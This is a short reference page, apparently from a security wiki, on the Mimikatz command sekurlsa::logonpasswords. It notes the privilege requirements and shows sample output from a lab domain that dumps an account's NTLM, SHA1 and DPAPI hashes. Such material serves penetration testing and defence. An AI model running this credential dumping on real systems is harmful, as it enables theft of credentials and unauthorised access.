logonpasswords
sekurlsa::logonpasswords lists all available provider credentials. This usually shows recently logged on user and computer credentials.
This command requires elevated privileges (by previously running privilege::debug or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).
1
mimikatz # sekurlsa::logonpasswords
2
โ€‹
3
Authentication Id : 0 ; 712960 (00000000:000ae100)
4
Session : Service from 0
5
User Name : MediaAdmin$
6
Domain : hacklab
7
Logon Server : DC
8
Logon Time : 9/26/2021 4:57:38 AM
9
SID : S-1-5-21-2725560159-1428537199-2260736313-1427
10
msv :
11
[00000003] Primary
12
* Username : MediaAdmin$
13
* Domain : hacklab
14
* NTLM : 35950fdc8d3d99b4136510414009662d
15
* SHA1 : 185535108abf1fc0287dedbaff210b77989251c8
16
* DPAPI : 73006d59c6adcf27da6e097787a6d1f9
17
tspkg :
18
wdigest :
19
* Username : MediaAdmin$
20
* Domain : hacklab
21
* Password : (null)
22
kerberos :
23
* Username : MediaAdmin$
24
* Domain : HACKLAB.LOCAL
25
* Password : (null)
26
ssp :
27
credman :
Copied!
Last modified 6mo ago
Copy link